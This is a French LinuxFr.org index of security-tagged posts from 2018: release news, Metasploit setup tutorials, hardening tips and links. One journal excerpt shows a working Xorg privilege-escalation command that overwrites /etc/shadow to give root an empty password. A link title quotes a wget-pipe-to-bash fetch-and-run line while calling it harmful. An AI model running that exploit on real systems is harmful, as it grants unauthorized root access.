PacketFence version 8.2 est disponible

Posté par Ludovic Marcotte (site web personnel) le 12 novembre 2018 à 00:48. Édité par bubar🦥, Davy Defaud et Benoît Sibaud. Modéré par bubar🦥. Licence CC By‑SA.

Étiquettes :

21

12

nov.

2018

Inverse annonce la sortie de la version 8.2 de PacketFence. PacketFence est une solution de conformité réseau (NAC) entièrement libre (GPL v2), supportée et reconnue. Procurant une liste impressionnante de fonctionnalités, telles un portail captif pour l’enregistrement ou la remédiation, une gestion centralisée des réseaux filaires et sans fil, le prise en charge du 802.1X, l’isolation niveau 2 des composantes identifiées comme problématiques, l’intégration aux détecteurs d’intrusions tels Snort et Suricata, la reconnaissance d’appareils avec Fingerbank et plus encore.

PacketFence peut être utilisé pour sécuriser efficacement aussi bien des réseaux de petite taille que de très grands réseaux hétérogènes.

Bien qu’étant une version « mineure », cette version 8.2 est une mise à jour importante, qui apporte de nombreux ajouts et de nombreuses améliorations, listés dans la suite de cette dépêche.

Forum général.petites-annonces DRI recrute 4 profils en télétravail

Posté par DRI le 05 novembre 2018 à 18:33. Licence CC By‑SA.

Étiquettes :

5

nov.

2018

Tout d'abord, longue vie à ce forum !
Grâce à lui, on a rencontré Alex qui a intégré les équipes DRI en télétravail comme adminsys, du bonheur !
Nous avions aussi posté en mai une annonce pour un dev et nous sommes finalement tombés (en dehors du forum sur un salon, le physique cela a du bon…) sur un super jeune en contrat d'apprentissage pour un bac +4.

Je poste donc nos nouvelles recherches pour intégrer l'équipe technique de DRI (…)

Forum Linux.débutant Meilleur distribution Linux pour confidentialité / anonymat

Posté par Anonyme le 04 novembre 2018 à 11:34. Licence CC By‑SA.

-3

4

nov.

2018

Lien Mise en demeure de l'association 42

Posté par volts le 30 octobre 2018 à 13:40.

Étiquettes :

11

30

oct.

2018

https://www.legifrance.gouv.fr/affichCnil.do?oldAction=rechExpCnil&id=CNILTEXT000037537391&fastReqId=1466136022&fastPos=4

Journal La faille grosse comme une maison

Posté par Psychofox (Mastodon) le 26 octobre 2018 à 10:59. Licence CC By‑SA.

Étiquettes :

28

26

oct.

2018

[Dev@localhost ~]$ id

uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[Dev@localhost ~]$
[Dev@localhost ~]$ cd /etc
[Dev@localhost etc]$
[Dev@localhost etc]$ ls -la shadow

----------. 1 root root 1241 Oct 10 01:15 shadow

[Dev@localhost etc]$
[Dev@localhost etc]$ cat shadow

cat: shadow: Permission denied

[Dev@localhost etc]$
[Dev@localhost etc]$ Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1

X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 3.10.0-693.17.1.el7.x86_64
Current Operating System: Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 (…)

Wiki [Tuto/HowTo] [Debian/Ubuntu] installer metasploit-framework depuis github

Licence CC By‑SA.

Étiquettes :

1

23

oct.

2018

"Un grand pouvoir implique de grandes responsabilités." oncle Ben.

Introduction

Ce tutoriel ne se concentre que sur l'installation de metasploit-framework depuis github.
Ce tuto n'explique PAS comment utiliser metasploit.

Installation

Installez les pré-requis.

sudo apt update
sudo apt-get install -y ruby-dev libpq-dev libpcap-dev libsqlite3-dev postgresql git ruby-bundler build-essential patch ruby-dev zlib1g-dev liblzma-dev libgmp-dev

Créez le dossier pour accueillir les fichiers.

sudo mkdir /opt/metasploit

Accordez les bonnes permissions au dossier.

sudo chown $USER:root -R /opt/metasploit
sudo

(…)

Wiki [Tuto/HowTo] [Debian/Ubuntu] Interfacer metasploit avec la base de données PostGreSQL

Licence CC By‑SA.

Étiquettes :

0

23

oct.

2018

musique d'ambiance : Best Melodic Dubstep Mix 2016

"Un grand pouvoir implique de grandes responsabilités." oncle Ben.

Introduction

Nous allons voir ici comment utiliser la base de données PostgreSQL avec Metasploit.

Mise en place

Connectez vous à l'utilisateur dédié de postgresql.

sudo -s -u postgres

Créez utilisateur dédié pour metasploit.

createuser -d -P metasploit

-d => autorise l'utilisateur à créer des base de données (n'est PAS nécessaire)
-P => on demande à définir un mot de (…)

Lien "wget http://foo.com/command.sh | bash" considered harmful

Posté par liberforce (site web personnel) le 19 octobre 2018 à 10:45.

Étiquettes :

11

19

oct.

2018

https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/

Forum Linux.debian/ubuntu [WorkFlow] [Ubuntu/Debian] Chiffrer ses partitions avec montage via commande SSH

Posté par voxdemonix le 04 octobre 2018 à 16:03. Licence CC By‑SA.

-1

4

oct.

2018

Lien L'état chinois suspecté d'avoir introduit des puces espionnes dans le design de matériel

Posté par liberforce (site web personnel) le 04 octobre 2018 à 14:33.

Étiquettes :

7

4

oct.

2018

https://www.bloomberg.com/news/features/2018-10-04/the-big-hack-how-china-used-a-tiny-chip-to-infiltrate-america-s-top-companies

Wiki [Tuto/HowTo] Nextcloud - restreindre accès à la page status.php

Licence CC By‑SA.

Étiquettes :

0

1

oct.

2018

Introduction

La page status.php sert aux applications nextcloud clientes de vérifier le status en ligne du serveur.
Cette page peut aussi être utilisé afin de forger des Google Dork permettant de trouver des installations de nextcloud potentiellement plus fragile face au piratage.
Topic sur le forum de la communauté nextcloud : https://help.nextcloud.com/t/how-to-censor-status-php-page/38040
Il est fortement déconseillé de bloquer l'accès à cette page au risque de casser les clients de Nextcloud.

Via HaProxy

Ajoutez les lignes suivantes dans voter Backend (conseillé) (…)

Lien CLIP OS : un système d'exploitation durci par l'ANSSI

Posté par dovik (site web personnel) le 20 septembre 2018 à 12:33.

Étiquettes :

18

20

sept.

2018

https://clip-os.org/fr/

Lien Foreshadow-NG : Va encore falloir patcher vos Intel

Posté par Flyounet (site web personnel) le 14 août 2018 à 23:39.

Étiquettes :

15

14

août

2018

https://foreshadowattack.eu

Lien Elon Musk veut libérer le source du système de sécurité de ses véhicules «for free use by [others]»

Posté par Thomas Debesse (site web personnel) le 13 août 2018 à 20:04.

Étiquettes :

10

13

août

2018

https://sciencepost.fr/2018/08/tesla-rend-le-systeme-de-securite-de-ses-vehicules-open-source/

Journal Reddit a subi une attaque informatique

Posté par Marotte ⛧ le 12 août 2018 à 01:26. Licence CC By‑SA.

Étiquettes :

20

12

août

2018

Rien de grande ampleur cela dit, qu’on se rassure, ce super site web de partage de liens qu’est Reddit est toujours en vie !

C’était il y a deux semaines environ. L’attaque a consisté en l’interception de SMS. Reddit recommande donc de passer à l’authentification 2FA qui utilise un jeton (à la place du SMS).

Toutes les données de 2007 et antérieures ont fuitées, mais les mots de passe sont hashés et salés (ce qui veut dire si je (…)

Tous les contenus étiquetés avec « sécurité »

Introduction

Installation

Introduction

Mise en place

Introduction

Via HaProxy